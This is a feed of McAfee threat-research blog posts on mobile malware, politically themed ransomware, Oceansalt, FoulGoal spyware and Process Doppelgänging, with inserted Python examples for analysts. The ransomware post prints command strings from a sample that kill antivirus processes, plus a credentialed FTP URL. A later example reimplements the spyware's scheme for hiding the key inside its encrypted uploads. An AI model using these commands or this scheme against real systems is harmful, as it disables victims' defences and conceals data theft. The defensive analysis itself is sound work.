Raj Samani – McAfee Blogs (https://securingtomorrow.mcafee.com), feed last updated Wed, 15 May 2019 16:35:16 +0000

In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/in-2019-the-threat-is-everywhere-malware-not-just-mobile-malware/
Wed, 27 Feb 2019 07:00:42 +0000


The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.


This time last year, we said that 2018 would be the year of mobile malware.

Today at MWC, we’re calling 2019 the year of everywhere malware.

In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.

Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.

In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.

A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.

At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.

The mobile ecosystem is continually changing. Operators and developers can get wise to tactics used by criminals but criminals will never give up in their pursuit for profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.

That’s why the entire tech industry, from the manufacturers of smart devices and mobile devices to developers and app store owners, must work more closely together. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital lives.

To find out more, see our latest Mobile Threat Report here.

MWC 2019: Why 5G + Fortnite = a win-win for criminals
https://securingtomorrow.mcafee.com/consumer/mwc-2019-why-5g-fortnite-a-win-win-for-criminals/
Mon, 18 Feb 2019 15:00:53 +0000


So apparently, the company behind Fortnite has so much cash that it’s forming a $100 million prize fund for upcoming competitions. It’s hardly surprising since its creators, Epic Games, confirmed that by the end of November 2018, 200 million players had registered accounts across PCs, gaming consoles and on mobile. The Android app alone was downloaded 15 million times within the first three weeks of its release.

Staggeringly, this remains a ‘free’ game. The freemium model is hardly new in the world of mobile apps (consider the returns Supercell got with Clash of Clans), but it also gives criminals an opportunity to take their share: the promise of an in-game advantage is particularly attractive when top gamers can earn hundreds of thousands of dollars.

Alternative delivery methods, such as the invitation-only beta version of Fortnite distributed in August 2018, brought a growth in promised invitations and in over-eager YouTubers posting links to apps that were not what they appeared to be. From an InfoSec perspective this is hardly surprising, but the reality is that we are dealing with an audience that exercises no due diligence in its pursuit of access to the latest games.

While Fortnite is undoubtedly a phenomenon, it’s just the tip of the iceberg. There are already challengers nipping at its heels. PUBG Mobile, for example, is played by 30 million people daily, while there are plans for EA’s Apex Legends to move over to mobile, having acquired 10 million online players in its first 72 hours.

The growing appetite for mobile gaming will only increase further this year with the arrival of 5G networks and its promise of super-fast speeds and ultra-low latency. And of course, as the number of mobile gamers continues to grow, so too will the opportunity for criminals to exploit them.

Seventy-five percent of gamers said security was the element that most concerned them about the future of gaming. Such concerns are hardly surprising, since we found that almost two thirds of gamers have been, or know someone who has been, directly affected by a cyberattack, with the average gamer experiencing around five attacks. The likelihood, however, is that these concerns are put to one side when a link to a third-party app store offers a beta version of the latest gaming phenomenon.

Analysts suggest that 2018 was a tipping point for mobile gaming, when cost, convenience and a social element saw the channel become bigger than console and PC gaming combined. Unfortunately, this means opportunistic criminals now have their eyes on a huge and growing number of potential victims.

Join us at this year’s Mobile World Congress in Barcelona, where we’ll be demoing McAfee Gamer Security, and revealing how criminals are cashing in on Fortnite and its unorthodox distribution method.

McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/
Wed, 19 Dec 2018 05:01:10 +0000


The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some notable statistics jump out of the report. The most striking is the continued rise of cryptojacking, which emerged unexpectedly over the course of the past year: in Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats also recorded new arrivals in a disturbing category: two new exploit kits, Fallout and Underminer, appeared in Q3. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to enter the digital crime business easily and cheaply.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

‘Operation Oceansalt’ Delivers Wave After Wave
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/
Thu, 18 Oct 2018 04:01:03 +0000

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Figure: code visualization of the recent Oceansalt sample (2018) alongside the older Seasalt implant (2010), showing the extent of reuse (image not reproduced here).

Who is Behind the Oceansalt Attack?

Comment Crew, originally designated APT1, was identified as the threat actor behind offensive cyber operations against the United States almost 10 years ago. The obvious suspect is therefore Comment Crew; although this may seem a logical conclusion, we have seen no activity from this group since it was first exposed. Is it possible that the group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why this campaign should occur now. Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. One thing, however, is certain: threat actors have a wealth of code available to leverage in new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case the collaboration appears to be not within a group but potentially between threat actors, which offers each considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

Political Figures Differ Online: Names of Trump, Obama, Merkel Attached to Ransomware Campaigns
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/political-figures-differ-online-names-of-trump-obama-merkel-attached-to-ransomware-campaigns/
Tue, 18 Sep 2018 04:01:37 +0000

Politics and ransomware. No, it’s not a lost single from the Oasis back catalogue, but in fact a relatively recent tactic by ransomware developers looking to exploit the profiles of major politicians to install ransomware on victims’ computers. Donald Trump, Angela Merkel, and now Barack Obama all serve as lures for the unsuspecting. Despite its claims, does the “Obama campaign” deliver the ransomware it advertises? Well, perhaps not.

The Obama campaign

Recently identified by the MalwareHunterTeam and documented by Bleeping Computer, the Obama campaign displayed some confusing characteristics. For example, it encrypted only .exe files and asked for a tip to decrypt the files. This campaign does not behave like normal ransomware variants, which typically target user data files rather than .exe files.

This unorthodoxy got us thinking: Was there a nation-state behind this campaign? At present there is not enough evidence to confirm its source, although the language resources are in simplified Chinese. We also discovered a graph embedded inside the ransomware (image not reproduced here).

As the MalwareHunterTeam documented, the ransomware attempts to kill processes belonging to several antimalware products. The strings below, shown in IDA’s strings-window format (section and address, length, type, string), also reference registry values of Qihoo 360Safe’s safemon component:

  • .rdata:004DAC80 0000001B C taskkill /f /im kavsvc.exe
  • .rdata:004DAC9B 00000019 C taskkill /f /im KVXP.kxp
  • .rdata:004DACB4 00000018 C taskkill /f /im Rav.exe
  • .rdata:004DACCC 0000001B C taskkill /f /im Ravmon.exe
  • .rdata:004DACE7 0000001D C taskkill /f /im Mcshield.exe
  • .rdata:004DAD04 0000001D C taskkill /f /im VsTskMgr.exe
  • .rdata:004DAD21 00000024 C SOFTWARE\\360Safe\\safemon\\ExecAccess
  • .rdata:004DAD45 00000023 C SOFTWARE\\360Safe\\safemon\\MonAccess
  • .rdata:004DAD68 00000024 C SOFTWARE\\360Safe\\safemon\\SiteAccess
  • .rdata:004DAD8C 00000025 C SOFTWARE\\360Safe\\safemon\\UDiskAccess

Note, however, that the access protection enabled in McAfee software prevented the termination of McAfee’s own process (screenshot in the original post, not reproduced here).
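As an added example, not code from the original post, here is how a defender might triage a sample for this kind of antimalware tampering: extract printable strings the way the `strings` utility does, then match `taskkill` command lines and 360Safe registry paths against a watch list built from the strings quoted above. The `.rdata`-style byte blobs are constructed for the example, and the product attributed to each process name is the editor’s annotation rather than something the post states.

```python
import re

# Process names from the strings above, annotated with the security product
# each is commonly associated with (editor's annotation, not from the post).
AV_PROCESSES = {
    "kavsvc.exe": "Kaspersky",
    "kvxp.kxp": "Jiangmin KV",
    "rav.exe": "Rising",
    "ravmon.exe": "Rising",
    "mcshield.exe": "McAfee",
    "vstskmgr.exe": "McAfee",
}

TASKKILL_RE = re.compile(r"taskkill\s+/f\s+/im\s+(\S+)", re.IGNORECASE)
# IDA shows the single backslash as "\\"; in the binary it is one byte, so
# match one or more backslashes between path components.
SAFEMON_RE = re.compile(r"SOFTWARE\\+360Safe\\+safemon\\+(\w+)", re.IGNORECASE)


def extract_strings(data: bytes, min_len: int = 6):
    """Minimal ASCII `strings`: runs of printable bytes at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def scan_for_av_tampering(data: bytes) -> dict:
    """Report which AV processes the sample tries to kill and which 360Safe
    safemon registry values it references."""
    kills, safemon_values = [], []
    for s in extract_strings(data):
        m = TASKKILL_RE.search(s)
        if m:
            name = m.group(1)
            kills.append((name, AV_PROCESSES.get(name.lower(), "unknown")))
        m = SAFEMON_RE.search(s)
        if m:
            safemon_values.append(m.group(1))
    return {
        "killed_processes": kills,
        "safemon_values": safemon_values,
        "suspicious": bool(kills or safemon_values),
    }


# Constructed stand-in for a binary's .rdata section: NUL-terminated strings
# with filler around them, using the strings quoted from the sample above.
SAMPLE_RDATA = b"\x00" * 16 + b"\x00".join([
    b"taskkill /f /im kavsvc.exe",
    b"taskkill /f /im KVXP.kxp",
    b"taskkill /f /im Mcshield.exe",
    b"SOFTWARE\\360Safe\\safemon\\ExecAccess",
    b"SOFTWARE\\360Safe\\safemon\\MonAccess",
    b"\x90\x90some unrelated text",
]) + b"\x00" * 16

# Constructed benign blob: ordinary strings, a registry path that is not 360Safe's.
BENIGN_RDATA = b"\x00Hello, world!\x00SOFTWARE\\Microsoft\\Windows\x00"


if __name__ == "__main__":
    report = scan_for_av_tampering(SAMPLE_RDATA)
    for proc, vendor in report["killed_processes"]:
        print(f"kills {proc} ({vendor})")
    for value in report["safemon_values"]:
        print(f"references 360Safe safemon value {value}")
    print("suspicious:", report["suspicious"])
```

A hit on this check is a strong triage signal but not a verdict: legitimate uninstallers and some administration tools also spawn `taskkill` against security products, so confirm by tracing the call in the disassembly before attributing intent.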

These curiosities made us wonder about the purpose of the ransomware. Was this indeed ransomware and, if so, why encrypt only .exe files? Our initial suspicions were immediately confirmed when we found a cryptocurrency coin mining component within the malware. In fact, the miner sample was almost identical to the ransomware component, with almost 80% code reuse. These similarities are highlighted below.

The executable-extension search function is where the overlap is clearest; the original post shows the matching code flow in the “Obama campaign” ransomware and in the coin miner sample side by side (images not reproduced here).

We also found this URL, embedded as a data string complete with credentials, pointing to an FTP server (host redacted):

  • FtpMoney812345 db ‘ftp://money8:12345678@xxxxxxxxxx.net/88.txt

The Trump campaign

A ransomware campaign leveraging images of Donald Trump has been previously documented. Is it possible that the two politicians are aligned with the same cybercriminal group looking to exploit their profiles?

As previously reported, this variant was only a development version, encrypting files with AES and appending the .encrypted extension.

However, this ransomware will “decrypt” the files if the victim clicks an “unlock files” button; the original post shows the code referencing decryption on the button click and the code that unlocks the files (images not reproduced here).

The Angela Merkel campaign

The use of Angela Merkel and her profile is new to the discussion. “Her” campaign encrypts files using the .angelamerkel extension. The original name of this ransomware was ChromeUpadter.exe; it also uses AES to encrypt files. It employs the Euro in its ransom demands. Perhaps a European figure evokes the Euro?

This ransomware encrypts a fixed list of file types (listed in a screenshot in the original post, not reproduced here).

Malware developers are fond of exploiting famous names to lure unsuspecting victims. Although it would be simple to claim an increase in politically motivated ransomware, or rather ransomware that leverages the profiles of political figures, there is no significant evidence to suggest they are from the same threat actor. Equally, these campaigns might not even be ransomware, certainly in the case of the Obama campaign.

Does this examination suggest three separate campaigns? There are some links and, no, they are not between Obama and Trump. The Trump and Merkel ransomware are 46% identical in code. We are left wondering whose campaign is the most successful. We shall see.
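The code-reuse figures quoted in this post (almost 80% between the “Obama campaign” ransomware and the coin miner, 46% between the Trump and Merkel samples) and the Oceansalt/Seasalt comparison earlier on this page come from McAfee’s own binary analysis, which the posts do not detail. As an added example, and not McAfee’s method, the following Python shows the simplest form of such a measurement: break each sample into overlapping byte n-grams (shingles) and compare the sets, giving both a symmetric Jaccard similarity and a directional “how much of the new sample came from the old one” fraction. The samples are constructed byte sequences, not the real implants.

```python
def shingles(code: bytes, n: int = 4) -> set:
    """All overlapping n-byte windows of the input, as a set."""
    return {code[i:i + n] for i in range(len(code) - n + 1)}


def jaccard(a: set, b: set) -> float:
    """Symmetric similarity: |A ∩ B| / |A ∪ B|, 1.0 for two empty sets."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def similarity(sample_a: bytes, sample_b: bytes, n: int = 4) -> float:
    """How alike two samples are overall."""
    return jaccard(shingles(sample_a, n), shingles(sample_b, n))


def reuse_fraction(sample: bytes, reference: bytes, n: int = 4) -> float:
    """Directional: the fraction of `sample`'s shingles that also occur in
    `reference`, i.e. how much of the new sample is drawn from the old one."""
    s, r = shingles(sample, n), shingles(reference, n)
    return len(s & r) / len(s) if s else 0.0


# Constructed "implants": 40 distinct bytes each so every shingle is unique.
# NEW_IMPLANT keeps the first half of OLD_IMPLANT and replaces the second half.
OLD_IMPLANT = bytes(range(0, 40))
NEW_IMPLANT = bytes(range(0, 20)) + bytes(range(100, 120))
UNRELATED = bytes(range(200, 240))


if __name__ == "__main__":
    print(f"old vs new   similarity: {similarity(OLD_IMPLANT, NEW_IMPLANT):.3f}")
    print(f"new reuses   {reuse_fraction(NEW_IMPLANT, OLD_IMPLANT):.1%} of old")
    print(f"old vs other similarity: {similarity(OLD_IMPLANT, UNRELATED):.3f}")
```

Two caveats a practitioner would add: byte-level shingles over-count statically linked runtime and library code that unrelated samples share, and they miss copies that a recompile has re-registered or re-laid-out. The figures in the posts would have come from comparing disassembled functions with operands normalized, which is the same set-comparison idea applied to sturdier features.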

McAfee ePO Platform Gains Insight Into Threat Research
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-epo-platform-gains-insight-into-threat-research/
Tue, 14 Aug 2018 21:49:25 +0000

The latest update to the McAfee® ePolicy Orchestrator® platform offers a new add-in to provide insight into the latest analysis carried out by McAfee Labs and the Advanced Threat Research team. The Security Resources section of the McAfee ePO™ console Version 5.10.0 will contain multiple windows providing the latest news.

The first window in the section shows an updated list of the most recent threats research published by the McAfee Labs team. This includes both malware and vulnerability research. For example, this week we released a report that shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. We also include research related to new malware campaigns. All our content is mapped to the MITRE ATT&CK framework and includes all known indicators of compromise, as well as detailing how McAfee products protect against the documented campaign.

Top threats

The section includes a condensed version of the Threat Landscape Dashboard, which contains the top threats across exploit kits, campaigns, ransomware, and vulnerabilities. The following screen shows how the summary will appear in the McAfee ePO console, allowing readers to easily review and click through these threats for more detail.

The latest McAfee ePO console will offer an easy review of analysis gathered by McAfee Labs and the Advanced Threat Research team.

Top stories
Want to know more? The Top Stories section offers the latest information from McAfee news sources, including new product releases and new blog content (beyond threats analysis).

Support and product advisories

At the bottom right of the screen you will find Security Product Advisories:

  • Support Notification Service: McAfee SNS is a proactive notification service that allows McAfee to communicate critical information in a timely manner on product upgrades, releases, and end-of-life notices. SNS is a vital information link during critical incidents, providing you with the updates you need to ensure that your systems and organization are protected.
  • Product Security Bulletins: McAfee is focused on ensuring the security of our customers’ computers, networks, devices, and data. We are committed to rapidly addressing issues as they arise, and providing recommendations through security bulletins and knowledgebase articles.
  • McAfee Labs Security Advisories: These are a free notification service backed by our global research team. McAfee Labs Security Advisories map high-profile threats to the McAfee technologies that protect your environment.

What next?

You can expect the dashboard to evolve and provide more detail in future versions. Please let us know what you would like to see.
Google Play Users Risk a Yellow Card With Android/FoulGoal.A
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/google-play-users-risk-a-yellow-card-with-android-foulgoal-a/
Thu, 12 Jul 2018 13:00:42 +0000

This blog post was co-written by Irfan Asrar.

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of data from the victim’s device and encrypts it before uploading:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version
  • IMEI, IMSI

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, writing the string “on” or “off” to track when users are looking at their screens.

MQTT (Message Queuing Telemetry Transport) serves as the communication channel between the device and the malicious server for sending and receiving commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. The Cryptor class provides the encryption and decryption functionality through a shared doCrypto function whose first parameter selects the mode: 1 for encryption, 2 for decryption.

The encryption key is generated dynamically using the SecureRandom function, which generates a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encryption data. The data with the key is uploaded to the control server.

We believe the malware author encrypts everything it uploads in this way to escape detection by Google Bouncer and by network inspection products.

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.
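The scheme described for both stages, a fresh random key that is spliced into the ciphertext at a position derived from the content size and a fixed number, is worth seeing end to end, because it explains why an analyst with the sample can read everything the spyware uploads or downloads. The Python below is an added example, not the spyware’s code: the Java Cryptor class, the addKey function and the actual offset formula are not reproduced on this page, so the splice position (`len(ciphertext) % FIXED_NUMBER`) and the constant are hypothetical, and a SHA-256 counter-mode keystream stands in for AES so that the example runs with the standard library alone. The embedding, not the cipher, is the point.

```python
import hashlib
import secrets
from typing import Optional

KEY_LEN = 16        # AES-128-sized key, generated per upload as with SecureRandom
FIXED_NUMBER = 97   # hypothetical stand-in for the constant in the first-stage APK


def keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode; stands in for AES so the example is self-contained."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(key: bytes, data: bytes) -> bytes:
    """Symmetric, so one function covers doCrypto's mode 1 (encrypt) and 2 (decrypt)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def key_offset(ciphertext_len: int) -> int:
    """Splice position derived from the content size and a fixed number
    (hypothetical formula; the post only says both are involved)."""
    return ciphertext_len % FIXED_NUMBER


def add_key(ciphertext: bytes, key: bytes) -> bytes:
    """Malware side (addKey): embed the key inside the encrypted data."""
    off = key_offset(len(ciphertext))
    return ciphertext[:off] + key + ciphertext[off:]


def pack_for_upload(plaintext: bytes, key: Optional[bytes] = None) -> bytes:
    """Malware side: encrypt under a fresh random key, then ship the key with it."""
    key = key or secrets.token_bytes(KEY_LEN)
    return add_key(xor_crypt(key, plaintext), key)


def recover_key(blob: bytes) -> bytes:
    """Analyst side: the blob's own length tells you where the key sits."""
    off = key_offset(len(blob) - KEY_LEN)
    return blob[off:off + KEY_LEN]


def unpack(blob: bytes) -> bytes:
    """Analyst side: pull the key out, close the gap, decrypt. Works the same
    for the uploaded device data and for the downloaded second-stage .data file."""
    key = recover_key(blob)
    off = key_offset(len(blob) - KEY_LEN)
    ciphertext = blob[:off] + blob[off + KEY_LEN:]
    return xor_crypt(key, ciphertext)


if __name__ == "__main__":
    # Constructed sample of the kind of record the spyware uploads.
    record = b'{"imei":"000000000000000","phone":"+0000000000","android":"8.0"}'
    blob = pack_for_upload(record)
    print("uploaded bytes:", blob.hex())
    print("recovered key :", recover_key(blob).hex())
    print("decrypted     :", unpack(blob).decode())
```

The takeaway for detection engineering is that this construction gives the attacker only obfuscation against signature matching on the wire, not confidentiality: every blob carries its own key at a computable position, so a network inspection product that knows the layout can decrypt uploads inline, and the same routine recovers the second-stage dex from the `.data` download.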

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The second-stage control server differs from the first stage’s, but the encryption methodology and the folder structure on the remote server are identical.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.

Variants

We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as Android/FoulGoal.A.

AsiaHitGroup Returns With New Billing-Fraud Campaign
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/asiahitgroup-returns-with-new-billing-fraud-campaign/
Thu, 28 Jun 2018 01:32:13 +0000

Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app, downloaded 50,000 times from the official app store, was one of them; all of them were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-spotlights-innovative-attack-techniques-cryptocurrency-mining-multisector-attacks/
Wed, 27 Jun 2018 04:01:07 +0000

In the McAfee Labs Threats Report June 2018, published today, we share investigative research and threat statistics gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of this year. We have observed that although overall new malware has declined by 31% since the previous quarter, bad actors are working relentlessly to develop new technologies and tactics that evade many security defenses.

These are the key campaigns we cover in this report.

  • Deeper investigations reveal that the attack targeting organizations involved in the Pyeongchang Winter Olympics in South Korea used not just one PowerShell implant script, but multiple implants, including Gold Dragon, which established persistence to engage in reconnaissance and enable continued data exfiltration.
  • The infamous global cybercrime ring known as Lazarus has resurfaced. We discovered that the group has launched the Bitcoin-stealing phishing campaign “HaoBao,” which targets the financial sector and Bitcoin users.
  • We are also seeing the emergence of a complex, multisector campaign dubbed Operation GhostSecret, which uses many data-gathering implants. We expect to see an escalation of these attacks in the near future.

Here are some additional findings and insights:

  • Ransomware drops: New ransomware attacks took a significant dive (-32%), largely as a result of an 81% drop in Android lockscreen malware.
  • Cryptojacking makes a comeback: Attackers targeting cryptocurrencies may be moving from ransomware to coin miner malware, which hijacks systems to mine for cryptocurrencies and increase their profits. New coin miner malware jumped an astronomical 1,189% in Q1.
  • LNK outpaces PowerShell: Cybercriminals are increasingly using LNK shortcuts to surreptitiously deliver malware. New PowerShell malware dropped 77% in Q1, while attacks leveraging Microsoft Windows LNK shortcut files jumped 24%.
  • Incidents go global: Overall security incidents rose 41% in Q1, with incidents hitting multiple regions showing the biggest increase, at 67%, and the Americas showing the next largest increase, at 40%.

Get all the details by reading the McAfee Labs Threats Report, June 2018.

The post ‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks appeared first on McAfee Blogs.

McAfee Protects Against Doppelgänging Technique
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-protects-against-doppelganging-technique/
Fri, 11 May 2018 15:00:40 +0000

This blog was co-written with Brook Schoenfield.

That adversaries adopt new techniques is a known fact. However, the speed at which they incorporate new techniques to bypass endpoint security or evade sandboxing appears to be ever increasing. Indeed, adversary adoption is often faster than the InfoSec industry can implement and test effective countermeasures. For example, in December 2017, a tool was released to hide PowerShell in a graphic file. Within 7 days of the release, McAfee Advanced Threat Research started to see the technique being exploited by a Nation State actor. From announcement to inclusion, test and use in production within 7 days is impressive.

This week, security researchers from Kaspersky discovered that an actor was applying the so-called Process Doppelgänging technique in what has been named the “SynAck” ransomware. (https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/)

So What is the Process Doppelgänging Technique in a Nutshell?

Using this technique gives the malware writer an ability to run malicious code/executable under the cover of a legitimate executable by using the transaction features of the NTFS filesystem (Windows Transactional NTFS API).

McAfee Detects and Protects

Since the initial release of this technique in December 2017, McAfee Labs has been investigating this technique and how we might protect our customers. In contrast to adversaries who can release mistakes in code and implementation, we simply cannot. We have to thoroughly test to ensure that when we release our solution it detects correctly and does not disrupt or break other software.

McAfee’s Product Security Incident Team (PSIRT), working in coordination with McAfee’s product teams1 delivered a protection to Process Doppelgänging in two of McAfee’s product suites (see below for more detail). McAfee’s protection has tested effective against EnSilo’s original proof of concept (PoC) and other examples. As an example, we tested recent malware using the technique against our detection feature with success:

McAfee’s protection prevents execution of a file if changes to it are contained within a Windows NTFS transaction. There are no legitimate uses for the Transactional API to be used in this way, so far as McAfee knows.

Details of products that include protection against Process Doppelgänging follow:

  • ENS 10.5.4, released April 24, 2018
  • VSE 8.8 patch 11, released April 24, 2018
